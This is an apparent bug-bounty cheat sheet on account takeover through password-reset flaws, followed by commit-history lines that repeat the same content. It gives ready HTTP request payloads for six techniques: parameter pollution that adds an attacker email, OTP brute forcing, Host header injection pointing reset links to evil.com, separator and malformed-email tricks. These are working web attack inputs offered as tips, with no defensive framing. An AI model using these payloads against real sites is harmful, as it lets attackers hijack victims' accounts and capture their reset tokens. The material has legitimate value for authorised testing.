AllAboutBugBounty/AccountTakeover.md

## Account Takeover

1. Parameter pollution in reset password
```
POST /reset
[...]
email=victim@mail.com&email=hacker@mail.com
```

2. Bruteforce the OTP code
```
POST /reset
[...]
email=victim@mail.com&code=$123456$
```

3. Host header Injection
```
POST /reset
Host: evil.com
[...]
email=victim@mail.com
```
And the victim will receive the reset link with evil.com

4. Using separator in value of the parameter
```
POST /reset
[...]
email=victim@mail.com,hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com%20hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com|hacker@mail.com
```

5. No domain in value of the paramter
```
POST /reset
[...]
email=victim
```

6. No TLD in value of the paramter
```
POST /reset
[...]
email=victim@mail
```
Account Takover [1] Create account takeover tips, and add 3 tips 2020-09-03 13:52:49 +00:00			`## Account Takeover`

			`1. Parameter pollution in reset password`
			```
			`POST /reset`
			`[...]`
			`email=victim@mail.com&email=hacker@mail.com`
			```

			`2. Bruteforce the OTP code`
			```
			`POST /reset`
			`[...]`
			`email=victim@mail.com&code=$123456$`
			```

			`3. Host header Injection`
			```
			`POST /reset`
			`Host: evil.com`
			`[...]`
			`email=victim@mail.com`
			```
Account Takover [2] Add 3 tips 2020-09-03 14:04:19 +00:00			`And the victim will receive the reset link with evil.com`

			`4. Using separator in value of the parameter`
			```
			`POST /reset`
			`[...]`
			`email=victim@mail.com,hacker@mail.com`
			```
			```
			`POST /reset`
			`[...]`
			`email=victim@mail.com%20hacker@mail.com`
			```
			```
			`POST /reset`
			`[...]`
			`email=victim@mail.com\|hacker@mail.com`
			```

			`5. No domain in value of the paramter`
			```
			`POST /reset`
			`[...]`
			`email=victim`
			```

			`6. No TLD in value of the paramter`
			```
			`POST /reset`
			`[...]`
			`email=victim@mail`
			```